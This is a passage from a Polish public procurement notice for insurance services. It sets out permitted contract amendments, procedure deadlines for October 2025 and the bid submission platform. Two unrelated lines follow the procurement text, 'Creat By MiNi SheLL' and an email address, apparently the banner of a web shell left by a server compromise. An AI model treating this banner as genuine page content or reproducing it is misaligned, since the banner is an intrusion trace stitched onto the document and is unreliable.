w rozumieniu art. 454 Ustawy oraz zmian przewidzianych stosownie do przepisu art. 455 ust. 1 pkt 1 Ustawy. Postanowienia niniejszej Umowy mogą ulec zmianie w stosunku do treści oferty Wykonawcy, bez przeprowadzania nowego postępowania o udzielenie zamówienia, jeżeli: <br/>1)	wystąpią korzystne dla Zamawiającego zmiany zakresu ubezpieczenia wynikające ze zmian OWU Wykonawcy za zgodą Zamawiającego i Wykonawcy;<br/>2)	wystąpią zmiany przepisów prawa i/lub zmiany stanu faktycznego, które powodować będą konieczność rozszerzenia danego ubezpieczenia określonego w niniejszej umowie lub spowodują niezasadność danego ubezpieczenia;<br/>3)	wystąpią zmiany wysokości składki w sytuacjach określonych w niniejszej umowie; <br/>4)	wystąpi konieczność wydłużenia terminu realizacji umowy maksymalnie o 3 miesiące i przy zastosowaniu dotychczasowych stawek, w celu umożliwienia Zamawiającemu przeprowadzenia lub ukończenia postępowania na udzielenie zamówienia na usługi ubezpieczenia na kolejny okres, zgodnie z ustawą Prawo zamówień publicznych.<br/><br/><br/>Z uwagi na limit znaków szczegółowe informacje dotyczące zmian umowy zawarte są we wzorze umowy stanowiącym<br/>załącznik nr 4 do SWZ, § 9. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-10-03 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/attis_broker</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-10-03 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-11-01</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com